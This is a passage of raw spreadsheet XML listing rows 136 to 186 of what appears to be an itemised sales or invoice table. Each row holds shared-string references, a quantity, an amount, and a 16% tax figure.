      </c>
      <c r="D136" s="238" t="s">
        <v>5009</v>
      </c>
      <c r="E136" s="238" t="s">
        <v>5010</v>
      </c>
      <c r="F136" s="238" t="s">
        <v>5002</v>
      </c>
      <c r="G136" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H136" s="10">
        <v>3</v>
      </c>
      <c r="I136" s="14">
        <v>390</v>
      </c>
      <c r="J136" s="15">
        <v>62.4</v>
      </c>
      <c r="K136" s="16"/>
    </row>
    <row r="137" spans="2:11">
      <c r="B137" s="9">
        <v>133</v>
      </c>
      <c r="C137" s="238" t="s">
        <v>5011</v>
      </c>
      <c r="D137" s="238" t="s">
        <v>5012</v>
      </c>
      <c r="E137" s="238" t="s">
        <v>5013</v>
      </c>
      <c r="F137" s="238" t="s">
        <v>5014</v>
      </c>
      <c r="G137" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H137" s="10">
        <v>1</v>
      </c>
      <c r="I137" s="14">
        <v>50</v>
      </c>
      <c r="J137" s="15">
        <v>8</v>
      </c>
      <c r="K137" s="16"/>
    </row>
    <row r="138" spans="2:11">
      <c r="B138" s="9">
        <v>134</v>
      </c>
      <c r="C138" s="238" t="s">
        <v>5015</v>
      </c>
      <c r="D138" s="238" t="s">
        <v>5016</v>
      </c>
      <c r="E138" s="238" t="s">
        <v>5017</v>
      </c>
      <c r="F138" s="238" t="s">
        <v>5014</v>
      </c>
      <c r="G138" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H138" s="10">
        <v>1</v>
      </c>
      <c r="I138" s="14">
        <v>55.94</v>
      </c>
      <c r="J138" s="15">
        <v>8.9504</v>
      </c>
      <c r="K138" s="16"/>
    </row>
    <row r="139" spans="2:11">
      <c r="B139" s="9">
        <v>135</v>
      </c>
      <c r="C139" s="238" t="s">
        <v>5018</v>
      </c>
      <c r="D139" s="9"/>
      <c r="E139" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F139" s="238" t="s">
        <v>4622</v>
      </c>
      <c r="G139" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H139" s="10">
        <v>2</v>
      </c>
      <c r="I139" s="14">
        <v>307.68</v>
      </c>
      <c r="J139" s="15">
        <v>49.2288</v>
      </c>
      <c r="K139" s="16"/>
    </row>
    <row r="140" spans="2:11">
      <c r="B140" s="9">
        <v>136</v>
      </c>
      <c r="C140" s="238" t="s">
        <v>5019</v>
      </c>
      <c r="D140" s="9"/>
      <c r="E140" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F140" s="238" t="s">
        <v>4622</v>
      </c>
      <c r="G140" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H140" s="10">
        <v>4</v>
      </c>
      <c r="I140" s="14">
        <v>85.44</v>
      </c>
      <c r="J140" s="15">
        <v>13.6704</v>
      </c>
      <c r="K140" s="16"/>
    </row>
    <row r="141" spans="2:11">
      <c r="B141" s="9">
        <v>137</v>
      </c>
      <c r="C141" s="238" t="s">
        <v>5020</v>
      </c>
      <c r="D141" s="9"/>
      <c r="E141" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F141" s="238" t="s">
        <v>4945</v>
      </c>
      <c r="G141" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H141" s="10">
        <v>2</v>
      </c>
      <c r="I141" s="14">
        <v>1864.96</v>
      </c>
      <c r="J141" s="15">
        <v>298.3936</v>
      </c>
      <c r="K141" s="16"/>
    </row>
    <row r="142" spans="2:11">
      <c r="B142" s="9">
        <v>138</v>
      </c>
      <c r="C142" s="238" t="s">
        <v>5021</v>
      </c>
      <c r="D142" s="9"/>
      <c r="E142" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F142" s="238" t="s">
        <v>4620</v>
      </c>
      <c r="G142" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H142" s="10">
        <v>5</v>
      </c>
      <c r="I142" s="14">
        <v>509.4</v>
      </c>
      <c r="J142" s="15">
        <v>81.504</v>
      </c>
      <c r="K142" s="16"/>
    </row>
    <row r="143" spans="2:11">
      <c r="B143" s="9">
        <v>139</v>
      </c>
      <c r="C143" s="238" t="s">
        <v>5022</v>
      </c>
      <c r="D143" s="9"/>
      <c r="E143" s="238" t="s">
        <v>4974</v>
      </c>
      <c r="F143" s="238" t="s">
        <v>4620</v>
      </c>
      <c r="G143" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H143" s="10">
        <v>2</v>
      </c>
      <c r="I143" s="14">
        <v>8.55</v>
      </c>
      <c r="J143" s="15">
        <v>1.3696</v>
      </c>
      <c r="K143" s="16"/>
    </row>
    <row r="144" spans="2:11">
      <c r="B144" s="9">
        <v>140</v>
      </c>
      <c r="C144" s="238" t="s">
        <v>5023</v>
      </c>
      <c r="D144" s="9"/>
      <c r="E144" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F144" s="238" t="s">
        <v>4620</v>
      </c>
      <c r="G144" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H144" s="10">
        <v>4</v>
      </c>
      <c r="I144" s="14">
        <v>2474.87</v>
      </c>
      <c r="J144" s="15">
        <v>395.9808</v>
      </c>
      <c r="K144" s="16"/>
    </row>
    <row r="145" spans="2:11">
      <c r="B145" s="9">
        <v>141</v>
      </c>
      <c r="C145" s="238" t="s">
        <v>5024</v>
      </c>
      <c r="D145" s="9"/>
      <c r="E145" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F145" s="238" t="s">
        <v>4620</v>
      </c>
      <c r="G145" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H145" s="10">
        <v>2</v>
      </c>
      <c r="I145" s="14">
        <v>1675.21</v>
      </c>
      <c r="J145" s="15">
        <v>268.0352</v>
      </c>
      <c r="K145" s="16"/>
    </row>
    <row r="146" spans="2:11">
      <c r="B146" s="9">
        <v>142</v>
      </c>
      <c r="C146" s="238" t="s">
        <v>5025</v>
      </c>
      <c r="D146" s="9"/>
      <c r="E146" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F146" s="238" t="s">
        <v>4620</v>
      </c>
      <c r="G146" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H146" s="10">
        <v>11</v>
      </c>
      <c r="I146" s="14">
        <v>258.83</v>
      </c>
      <c r="J146" s="15">
        <v>41.4128</v>
      </c>
      <c r="K146" s="16"/>
    </row>
    <row r="147" spans="2:11">
      <c r="B147" s="9">
        <v>143</v>
      </c>
      <c r="C147" s="238" t="s">
        <v>5026</v>
      </c>
      <c r="D147" s="9"/>
      <c r="E147" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F147" s="238" t="s">
        <v>4620</v>
      </c>
      <c r="G147" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H147" s="10">
        <v>6</v>
      </c>
      <c r="I147" s="14">
        <v>564.1</v>
      </c>
      <c r="J147" s="15">
        <v>90.2592</v>
      </c>
      <c r="K147" s="16"/>
    </row>
    <row r="148" spans="2:11">
      <c r="B148" s="9">
        <v>144</v>
      </c>
      <c r="C148" s="238" t="s">
        <v>5027</v>
      </c>
      <c r="D148" s="9"/>
      <c r="E148" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F148" s="238" t="s">
        <v>5029</v>
      </c>
      <c r="G148" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H148" s="10">
        <v>4</v>
      </c>
      <c r="I148" s="14">
        <v>1444.44</v>
      </c>
      <c r="J148" s="15">
        <v>231.1104</v>
      </c>
      <c r="K148" s="16"/>
    </row>
    <row r="149" spans="2:11">
      <c r="B149" s="9">
        <v>145</v>
      </c>
      <c r="C149" s="238" t="s">
        <v>5030</v>
      </c>
      <c r="D149" s="238" t="s">
        <v>5031</v>
      </c>
      <c r="E149" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F149" s="238" t="s">
        <v>5032</v>
      </c>
      <c r="G149" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H149" s="10">
        <v>4</v>
      </c>
      <c r="I149" s="14">
        <v>596.39</v>
      </c>
      <c r="J149" s="15">
        <v>95.424</v>
      </c>
      <c r="K149" s="16"/>
    </row>
    <row r="150" spans="2:11">
      <c r="B150" s="9">
        <v>146</v>
      </c>
      <c r="C150" s="238" t="s">
        <v>5033</v>
      </c>
      <c r="D150" s="238" t="s">
        <v>5034</v>
      </c>
      <c r="E150" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F150" s="238" t="s">
        <v>5035</v>
      </c>
      <c r="G150" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H150" s="10">
        <v>2</v>
      </c>
      <c r="I150" s="14">
        <v>376.07</v>
      </c>
      <c r="J150" s="15">
        <v>60.1728</v>
      </c>
      <c r="K150" s="16"/>
    </row>
    <row r="151" spans="2:11">
      <c r="B151" s="9">
        <v>147</v>
      </c>
      <c r="C151" s="238" t="s">
        <v>5036</v>
      </c>
      <c r="D151" s="238" t="s">
        <v>5037</v>
      </c>
      <c r="E151" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F151" s="238" t="s">
        <v>5032</v>
      </c>
      <c r="G151" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H151" s="10">
        <v>1</v>
      </c>
      <c r="I151" s="14">
        <v>149.57</v>
      </c>
      <c r="J151" s="15">
        <v>23.9312</v>
      </c>
      <c r="K151" s="16"/>
    </row>
    <row r="152" spans="2:11">
      <c r="B152" s="9">
        <v>148</v>
      </c>
      <c r="C152" s="238" t="s">
        <v>5038</v>
      </c>
      <c r="D152" s="9"/>
      <c r="E152" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F152" s="238" t="s">
        <v>5039</v>
      </c>
      <c r="G152" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H152" s="10">
        <v>1</v>
      </c>
      <c r="I152" s="14">
        <v>94.01</v>
      </c>
      <c r="J152" s="15">
        <v>15.0416</v>
      </c>
      <c r="K152" s="16"/>
    </row>
    <row r="153" spans="2:11">
      <c r="B153" s="9">
        <v>149</v>
      </c>
      <c r="C153" s="238" t="s">
        <v>5040</v>
      </c>
      <c r="D153" s="9"/>
      <c r="E153" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F153" s="238" t="s">
        <v>5039</v>
      </c>
      <c r="G153" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H153" s="10">
        <v>4</v>
      </c>
      <c r="I153" s="14">
        <v>478.63</v>
      </c>
      <c r="J153" s="15">
        <v>76.5824</v>
      </c>
      <c r="K153" s="16"/>
    </row>
    <row r="154" spans="2:11">
      <c r="B154" s="9">
        <v>150</v>
      </c>
      <c r="C154" s="238" t="s">
        <v>5041</v>
      </c>
      <c r="D154" s="238" t="s">
        <v>5042</v>
      </c>
      <c r="E154" s="238" t="s">
        <v>5043</v>
      </c>
      <c r="F154" s="238" t="s">
        <v>5044</v>
      </c>
      <c r="G154" s="237" t="s">
        <v>5045</v>
      </c>
      <c r="H154" s="10">
        <v>2</v>
      </c>
      <c r="I154" s="14">
        <v>47.86</v>
      </c>
      <c r="J154" s="15">
        <v>7.6576</v>
      </c>
      <c r="K154" s="16"/>
    </row>
    <row r="155" spans="2:11">
      <c r="B155" s="9">
        <v>151</v>
      </c>
      <c r="C155" s="238" t="s">
        <v>5046</v>
      </c>
      <c r="D155" s="9"/>
      <c r="E155" s="238" t="s">
        <v>5047</v>
      </c>
      <c r="F155" s="238" t="s">
        <v>5048</v>
      </c>
      <c r="G155" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H155" s="10">
        <v>1</v>
      </c>
      <c r="I155" s="14">
        <v>1452.99</v>
      </c>
      <c r="J155" s="15">
        <v>232.4784</v>
      </c>
      <c r="K155" s="16"/>
    </row>
    <row r="156" spans="2:11">
      <c r="B156" s="9">
        <v>152</v>
      </c>
      <c r="C156" s="238" t="s">
        <v>5049</v>
      </c>
      <c r="D156" s="238" t="s">
        <v>5050</v>
      </c>
      <c r="E156" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F156" s="238" t="s">
        <v>5051</v>
      </c>
      <c r="G156" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H156" s="10">
        <v>1</v>
      </c>
      <c r="I156" s="14">
        <v>239.32</v>
      </c>
      <c r="J156" s="15">
        <v>38.2912</v>
      </c>
      <c r="K156" s="16"/>
    </row>
    <row r="157" spans="2:11">
      <c r="B157" s="9">
        <v>153</v>
      </c>
      <c r="C157" s="238" t="s">
        <v>5052</v>
      </c>
      <c r="D157" s="238" t="s">
        <v>5053</v>
      </c>
      <c r="E157" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F157" s="238" t="s">
        <v>5051</v>
      </c>
      <c r="G157" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H157" s="10">
        <v>2</v>
      </c>
      <c r="I157" s="14">
        <v>1462.59</v>
      </c>
      <c r="J157" s="15">
        <v>234.016</v>
      </c>
      <c r="K157" s="16"/>
    </row>
    <row r="158" spans="2:11">
      <c r="B158" s="9">
        <v>154</v>
      </c>
      <c r="C158" s="238" t="s">
        <v>5054</v>
      </c>
      <c r="D158" s="9"/>
      <c r="E158" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F158" s="238" t="s">
        <v>5055</v>
      </c>
      <c r="G158" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H158" s="10">
        <v>1</v>
      </c>
      <c r="I158" s="14">
        <v>290.59</v>
      </c>
      <c r="J158" s="15">
        <v>46.4944</v>
      </c>
      <c r="K158" s="16"/>
    </row>
    <row r="159" spans="2:11">
      <c r="B159" s="9">
        <v>155</v>
      </c>
      <c r="C159" s="238" t="s">
        <v>5056</v>
      </c>
      <c r="D159" s="9"/>
      <c r="E159" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F159" s="238" t="s">
        <v>5057</v>
      </c>
      <c r="G159" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H159" s="10">
        <v>1</v>
      </c>
      <c r="I159" s="14">
        <v>337.61</v>
      </c>
      <c r="J159" s="15">
        <v>54.0176</v>
      </c>
      <c r="K159" s="16"/>
    </row>
    <row r="160" spans="2:11">
      <c r="B160" s="9">
        <v>156</v>
      </c>
      <c r="C160" s="238" t="s">
        <v>5058</v>
      </c>
      <c r="D160" s="9"/>
      <c r="E160" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F160" s="238" t="s">
        <v>5057</v>
      </c>
      <c r="G160" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H160" s="10">
        <v>2</v>
      </c>
      <c r="I160" s="14">
        <v>82.05</v>
      </c>
      <c r="J160" s="15">
        <v>13.1296</v>
      </c>
      <c r="K160" s="16"/>
    </row>
    <row r="161" spans="2:11">
      <c r="B161" s="9">
        <v>157</v>
      </c>
      <c r="C161" s="238" t="s">
        <v>5059</v>
      </c>
      <c r="D161" s="238" t="s">
        <v>5060</v>
      </c>
      <c r="E161" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F161" s="238" t="s">
        <v>5057</v>
      </c>
      <c r="G161" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H161" s="10">
        <v>1</v>
      </c>
      <c r="I161" s="14">
        <v>81.2</v>
      </c>
      <c r="J161" s="15">
        <v>12.992</v>
      </c>
      <c r="K161" s="16"/>
    </row>
    <row r="162" spans="2:11">
      <c r="B162" s="9">
        <v>158</v>
      </c>
      <c r="C162" s="238" t="s">
        <v>5061</v>
      </c>
      <c r="D162" s="238" t="s">
        <v>5062</v>
      </c>
      <c r="E162" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F162" s="238" t="s">
        <v>5063</v>
      </c>
      <c r="G162" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H162" s="10">
        <v>2</v>
      </c>
      <c r="I162" s="14">
        <v>779.49</v>
      </c>
      <c r="J162" s="15">
        <v>124.72</v>
      </c>
      <c r="K162" s="16"/>
    </row>
    <row r="163" spans="2:11">
      <c r="B163" s="9">
        <v>159</v>
      </c>
      <c r="C163" s="238" t="s">
        <v>5064</v>
      </c>
      <c r="D163" s="238" t="s">
        <v>5065</v>
      </c>
      <c r="E163" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F163" s="238" t="s">
        <v>5066</v>
      </c>
      <c r="G163" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H163" s="10">
        <v>1</v>
      </c>
      <c r="I163" s="14">
        <v>29.91</v>
      </c>
      <c r="J163" s="15">
        <v>4.7856</v>
      </c>
      <c r="K163" s="16"/>
    </row>
    <row r="164" spans="2:11">
      <c r="B164" s="9">
        <v>160</v>
      </c>
      <c r="C164" s="238" t="s">
        <v>5067</v>
      </c>
      <c r="D164" s="238" t="s">
        <v>5068</v>
      </c>
      <c r="E164" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F164" s="238" t="s">
        <v>5069</v>
      </c>
      <c r="G164" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H164" s="10">
        <v>2</v>
      </c>
      <c r="I164" s="14">
        <v>128.21</v>
      </c>
      <c r="J164" s="15">
        <v>20.5152</v>
      </c>
      <c r="K164" s="16"/>
    </row>
    <row r="165" spans="2:11">
      <c r="B165" s="9">
        <v>161</v>
      </c>
      <c r="C165" s="238" t="s">
        <v>5070</v>
      </c>
      <c r="D165" s="238" t="s">
        <v>5071</v>
      </c>
      <c r="E165" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F165" s="238" t="s">
        <v>5072</v>
      </c>
      <c r="G165" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H165" s="10">
        <v>1</v>
      </c>
      <c r="I165" s="14">
        <v>236.96</v>
      </c>
      <c r="J165" s="15">
        <v>37.9136</v>
      </c>
      <c r="K165" s="16"/>
    </row>
    <row r="166" spans="2:11">
      <c r="B166" s="9">
        <v>162</v>
      </c>
      <c r="C166" s="238" t="s">
        <v>5073</v>
      </c>
      <c r="D166" s="9"/>
      <c r="E166" s="238" t="s">
        <v>4724</v>
      </c>
      <c r="F166" s="238" t="s">
        <v>5066</v>
      </c>
      <c r="G166" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H166" s="10">
        <v>2</v>
      </c>
      <c r="I166" s="14">
        <v>547</v>
      </c>
      <c r="J166" s="15">
        <v>87.52</v>
      </c>
      <c r="K166" s="16"/>
    </row>
    <row r="167" spans="2:11">
      <c r="B167" s="9">
        <v>163</v>
      </c>
      <c r="C167" s="238" t="s">
        <v>5074</v>
      </c>
      <c r="D167" s="9"/>
      <c r="E167" s="238" t="s">
        <v>5075</v>
      </c>
      <c r="F167" s="238" t="s">
        <v>5076</v>
      </c>
      <c r="G167" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H167" s="10">
        <v>2</v>
      </c>
      <c r="I167" s="14">
        <v>431.62</v>
      </c>
      <c r="J167" s="15">
        <v>69.0592</v>
      </c>
      <c r="K167" s="16"/>
    </row>
    <row r="168" spans="2:11">
      <c r="B168" s="9">
        <v>164</v>
      </c>
      <c r="C168" s="238" t="s">
        <v>5077</v>
      </c>
      <c r="D168" s="238" t="s">
        <v>5078</v>
      </c>
      <c r="E168" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F168" s="238" t="s">
        <v>5076</v>
      </c>
      <c r="G168" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H168" s="10">
        <v>2</v>
      </c>
      <c r="I168" s="14">
        <v>65.8</v>
      </c>
      <c r="J168" s="15">
        <v>10.528</v>
      </c>
      <c r="K168" s="16"/>
    </row>
    <row r="169" spans="2:11">
      <c r="B169" s="9">
        <v>165</v>
      </c>
      <c r="C169" s="238" t="s">
        <v>5079</v>
      </c>
      <c r="D169" s="238" t="s">
        <v>5080</v>
      </c>
      <c r="E169" s="238" t="s">
        <v>4724</v>
      </c>
      <c r="F169" s="238" t="s">
        <v>5076</v>
      </c>
      <c r="G169" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H169" s="10">
        <v>5</v>
      </c>
      <c r="I169" s="14">
        <v>7670.03</v>
      </c>
      <c r="J169" s="15">
        <v>1227.208</v>
      </c>
      <c r="K169" s="16"/>
    </row>
    <row r="170" spans="2:11">
      <c r="B170" s="9">
        <v>166</v>
      </c>
      <c r="C170" s="238" t="s">
        <v>5081</v>
      </c>
      <c r="D170" s="9"/>
      <c r="E170" s="238" t="s">
        <v>4724</v>
      </c>
      <c r="F170" s="238" t="s">
        <v>5082</v>
      </c>
      <c r="G170" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H170" s="10">
        <v>1</v>
      </c>
      <c r="I170" s="14">
        <v>564.1</v>
      </c>
      <c r="J170" s="15">
        <v>90.256</v>
      </c>
      <c r="K170" s="16"/>
    </row>
    <row r="171" spans="2:11">
      <c r="B171" s="9">
        <v>167</v>
      </c>
      <c r="C171" s="238" t="s">
        <v>5083</v>
      </c>
      <c r="D171" s="9"/>
      <c r="E171" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F171" s="238" t="s">
        <v>5084</v>
      </c>
      <c r="G171" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H171" s="10">
        <v>2</v>
      </c>
      <c r="I171" s="14">
        <v>111.11</v>
      </c>
      <c r="J171" s="15">
        <v>17.7792</v>
      </c>
      <c r="K171" s="16"/>
    </row>
    <row r="172" spans="2:11">
      <c r="B172" s="9">
        <v>168</v>
      </c>
      <c r="C172" s="238" t="s">
        <v>5085</v>
      </c>
      <c r="D172" s="9"/>
      <c r="E172" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F172" s="238" t="s">
        <v>5084</v>
      </c>
      <c r="G172" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H172" s="10">
        <v>4</v>
      </c>
      <c r="I172" s="14">
        <v>1009.4</v>
      </c>
      <c r="J172" s="15">
        <v>161.504</v>
      </c>
      <c r="K172" s="16"/>
    </row>
    <row r="173" spans="2:11">
      <c r="B173" s="9">
        <v>169</v>
      </c>
      <c r="C173" s="238" t="s">
        <v>5086</v>
      </c>
      <c r="D173" s="9"/>
      <c r="E173" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F173" s="238" t="s">
        <v>5087</v>
      </c>
      <c r="G173" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H173" s="10">
        <v>1</v>
      </c>
      <c r="I173" s="14">
        <v>42.94</v>
      </c>
      <c r="J173" s="15">
        <v>6.8704</v>
      </c>
      <c r="K173" s="16"/>
    </row>
    <row r="174" spans="2:11">
      <c r="B174" s="9">
        <v>170</v>
      </c>
      <c r="C174" s="238" t="s">
        <v>5088</v>
      </c>
      <c r="D174" s="238" t="s">
        <v>5089</v>
      </c>
      <c r="E174" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F174" s="238" t="s">
        <v>5087</v>
      </c>
      <c r="G174" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H174" s="10">
        <v>2</v>
      </c>
      <c r="I174" s="14">
        <v>478.63</v>
      </c>
      <c r="J174" s="15">
        <v>76.5824</v>
      </c>
      <c r="K174" s="16"/>
    </row>
    <row r="175" spans="2:11">
      <c r="B175" s="9">
        <v>171</v>
      </c>
      <c r="C175" s="238" t="s">
        <v>5090</v>
      </c>
      <c r="D175" s="238" t="s">
        <v>5091</v>
      </c>
      <c r="E175" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F175" s="238" t="s">
        <v>5087</v>
      </c>
      <c r="G175" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H175" s="10">
        <v>3</v>
      </c>
      <c r="I175" s="14">
        <v>760.68</v>
      </c>
      <c r="J175" s="15">
        <v>121.7088</v>
      </c>
      <c r="K175" s="16"/>
    </row>
    <row r="176" spans="2:11">
      <c r="B176" s="9">
        <v>172</v>
      </c>
      <c r="C176" s="238" t="s">
        <v>5092</v>
      </c>
      <c r="D176" s="238" t="s">
        <v>5093</v>
      </c>
      <c r="E176" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F176" s="238" t="s">
        <v>5094</v>
      </c>
      <c r="G176" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H176" s="10">
        <v>1</v>
      </c>
      <c r="I176" s="14">
        <v>7.26</v>
      </c>
      <c r="J176" s="15">
        <v>1.1616</v>
      </c>
      <c r="K176" s="16"/>
    </row>
    <row r="177" spans="2:11">
      <c r="B177" s="9">
        <v>173</v>
      </c>
      <c r="C177" s="238" t="s">
        <v>5095</v>
      </c>
      <c r="D177" s="238" t="s">
        <v>5096</v>
      </c>
      <c r="E177" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F177" s="238" t="s">
        <v>5094</v>
      </c>
      <c r="G177" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H177" s="10">
        <v>2</v>
      </c>
      <c r="I177" s="14">
        <v>598.29</v>
      </c>
      <c r="J177" s="15">
        <v>95.728</v>
      </c>
      <c r="K177" s="16"/>
    </row>
    <row r="178" spans="2:11">
      <c r="B178" s="9">
        <v>174</v>
      </c>
      <c r="C178" s="238" t="s">
        <v>5097</v>
      </c>
      <c r="D178" s="238" t="s">
        <v>5098</v>
      </c>
      <c r="E178" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F178" s="238" t="s">
        <v>5099</v>
      </c>
      <c r="G178" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H178" s="10">
        <v>2</v>
      </c>
      <c r="I178" s="14">
        <v>450.14</v>
      </c>
      <c r="J178" s="15">
        <v>72.0224</v>
      </c>
      <c r="K178" s="16"/>
    </row>
    <row r="179" spans="2:11">
      <c r="B179" s="9">
        <v>175</v>
      </c>
      <c r="C179" s="238" t="s">
        <v>5100</v>
      </c>
      <c r="D179" s="9"/>
      <c r="E179" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F179" s="238" t="s">
        <v>5099</v>
      </c>
      <c r="G179" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H179" s="10">
        <v>2</v>
      </c>
      <c r="I179" s="14">
        <v>9.9</v>
      </c>
      <c r="J179" s="15">
        <v>1.584</v>
      </c>
      <c r="K179" s="16"/>
    </row>
    <row r="180" spans="2:11">
      <c r="B180" s="9">
        <v>176</v>
      </c>
      <c r="C180" s="238" t="s">
        <v>5101</v>
      </c>
      <c r="D180" s="238" t="s">
        <v>5102</v>
      </c>
      <c r="E180" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F180" s="238" t="s">
        <v>5103</v>
      </c>
      <c r="G180" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H180" s="10">
        <v>3</v>
      </c>
      <c r="I180" s="14">
        <v>1670.73</v>
      </c>
      <c r="J180" s="15">
        <v>267.3168</v>
      </c>
      <c r="K180" s="16"/>
    </row>
    <row r="181" spans="2:11">
      <c r="B181" s="9">
        <v>177</v>
      </c>
      <c r="C181" s="238" t="s">
        <v>5104</v>
      </c>
      <c r="D181" s="238" t="s">
        <v>5105</v>
      </c>
      <c r="E181" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F181" s="238" t="s">
        <v>5103</v>
      </c>
      <c r="G181" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H181" s="10">
        <v>5</v>
      </c>
      <c r="I181" s="14">
        <v>215.11</v>
      </c>
      <c r="J181" s="15">
        <v>34.416</v>
      </c>
      <c r="K181" s="16"/>
    </row>
    <row r="182" spans="2:11">
      <c r="B182" s="9">
        <v>178</v>
      </c>
      <c r="C182" s="238" t="s">
        <v>5106</v>
      </c>
      <c r="D182" s="238" t="s">
        <v>5107</v>
      </c>
      <c r="E182" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F182" s="238" t="s">
        <v>5103</v>
      </c>
      <c r="G182" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H182" s="10">
        <v>2</v>
      </c>
      <c r="I182" s="14">
        <v>468.81</v>
      </c>
      <c r="J182" s="15">
        <v>75.0112</v>
      </c>
      <c r="K182" s="16"/>
    </row>
    <row r="183" spans="2:11">
      <c r="B183" s="9">
        <v>179</v>
      </c>
      <c r="C183" s="238" t="s">
        <v>5108</v>
      </c>
      <c r="D183" s="238" t="s">
        <v>5109</v>
      </c>
      <c r="E183" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F183" s="238" t="s">
        <v>5110</v>
      </c>
      <c r="G183" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H183" s="10">
        <v>3</v>
      </c>
      <c r="I183" s="14">
        <v>595.49</v>
      </c>
      <c r="J183" s="15">
        <v>95.28</v>
      </c>
      <c r="K183" s="16"/>
    </row>
    <row r="184" spans="2:11">
      <c r="B184" s="9">
        <v>180</v>
      </c>
      <c r="C184" s="238" t="s">
        <v>5111</v>
      </c>
      <c r="D184" s="238" t="s">
        <v>5112</v>
      </c>
      <c r="E184" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F184" s="238" t="s">
        <v>5110</v>
      </c>
      <c r="G184" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H184" s="10">
        <v>4</v>
      </c>
      <c r="I184" s="14">
        <v>162.38</v>
      </c>
      <c r="J184" s="15">
        <v>25.984</v>
      </c>
      <c r="K184" s="16"/>
    </row>
    <row r="185" spans="2:11">
      <c r="B185" s="9">
        <v>181</v>
      </c>
      <c r="C185" s="238" t="s">
        <v>5113</v>
      </c>
      <c r="D185" s="238" t="s">
        <v>5114</v>
      </c>
      <c r="E185" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F185" s="238" t="s">
        <v>5110</v>
      </c>
      <c r="G185" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H185" s="10">
        <v>3</v>
      </c>
      <c r="I185" s="14">
        <v>1102.23</v>
      </c>
      <c r="J185" s="15">
        <v>176.3568</v>
      </c>
      <c r="K185" s="16"/>
    </row>
    <row r="186" spans="2:11">
      <c r="B186" s="9">
        <v>182</v>
      </c>
      <c r="C186" s="238" t="s">
        <v>5115</v>
      </c>
      <c r="D186" s="238" t="s">
        <v>5116</v>
      </c>
